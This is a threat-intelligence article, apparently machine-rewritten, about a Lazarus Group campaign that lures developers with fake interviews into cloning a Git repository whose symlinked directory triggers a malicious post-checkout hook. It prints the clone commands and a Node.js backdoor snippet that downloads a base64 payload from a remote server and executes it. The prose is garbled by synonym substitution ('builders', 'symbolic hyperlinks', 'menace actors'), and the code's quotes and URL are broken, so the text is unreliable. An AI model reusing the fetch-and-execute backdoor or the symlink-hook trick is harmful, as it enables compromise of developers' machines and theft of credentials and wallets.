Early this month, cybersecurity researchers uncovered a novel phishing marketing campaign attributed to the Lazarus Group that targets builders and crypto professionals via a cleverly crafted Git symlink vulnerability.
Moderately than relying solely on conventional malware distribution channels, the attackers have weaponized the best way Git handles repository paths, embedding malicious hooks inside symbolic hyperlinks to set off code execution throughout routine operations.
This system permits the attackers to take care of a low profile whereas compromising high-value targets who assume that their improvement workflows are resistant to social engineering.
The preliminary lure begins with customized messages on skilled networking platforms, the place potential victims are invited to take part in a mock technical interview.
The dialog is structured to realize the sufferer’s confidence and coax them into operating a single Git clone command.
Moreover this, the repository accommodates a nested listing named api/db_drivers that’s truly a symbolic hyperlink pointing again into the repository’s .git module listing.
This misleading construction ensures that after Git performs a checkout operation, it unwittingly executes the attacker’s customized hook script.
KuCoin analysts famous the primary cases of this assault vector in late August, following stories of compromised personal GitLab repositories.
Detailed evaluation revealed that the symlink exploit leverages Git’s post-checkout hook mechanism to provoke a hidden backdoor.
By embedding a malicious post-checkout script inside the symbolic hyperlink, the attackers obtain code execution with out modifying the principle codebase, thus evading normal integrity checks and static scanners.
Subsequent forensic examination confirmed that the payload establishes an encrypted connection to a distant command-and-control server, siphoning credentials, system info, and pockets information again to the menace actors.
Assault Flowchart (Non-Technical) (Supply – Kucoin)
The exploit’s sophistication lies in its seamless integration with authentic workflows. Victims report that after executing:-
git clone –recursive https://visitor:[email protected]/product/supply.git
cd product/supply
The malicious hook is mechanically triggered. The embedded script, hooks/post-checkout, invokes a Node.js backdoor:-
const vm = require(‘vm’);
const https = require(‘https’);
https.get(‘ res => {
let information=””;
res.on(‘information’, chunk => information += chunk);
res.on(‘finish’, () => vm.runInNewContext(Buffer.from(JSON.parse(information).payload, ‘base64’)));
});
As soon as deployed, this backdoor maintains persistence by cleansing and changing challenge information to take away apparent indicators of tampering, guaranteeing that builders see solely the anticipated code.
An infection Mechanism Deep Dive
The an infection unfolds in two coordinated phases: exploitation of Git’s path decision and stealthy hook execution.
First, the attackers create a repository with a listing entry named api/db_drivers^M, exploiting carriage return dealing with to put in writing the trail as api/db_drivers on disk whereas retaining the symlink goal internally.
Assault Flowchart (Technical) (Supply – Kucoin)
This discrepancy confuses Git into treating the trail as an everyday listing throughout traversal however as a hyperlink when initializing hooks.
As Git performs the default checkout, it follows the hidden symlink into the .git/modules/api/db_drivers/hooks/ listing and executes the post-checkout script.
By exploiting a basic conduct of Git, the Lazarus Group has demonstrated a brand new stage of technical ingenuity, mixing provide chain compromise with social engineering to focus on high-value people.
The marketing campaign serves as a stark reminder that even probably the most trusted improvement instruments might be weaponized when assumptions about workflow integrity go unchallenged.
Enhance your SOC and assist your staff defend your corporation with free top-notch menace intelligence: Request TI Lookup Premium Trial.
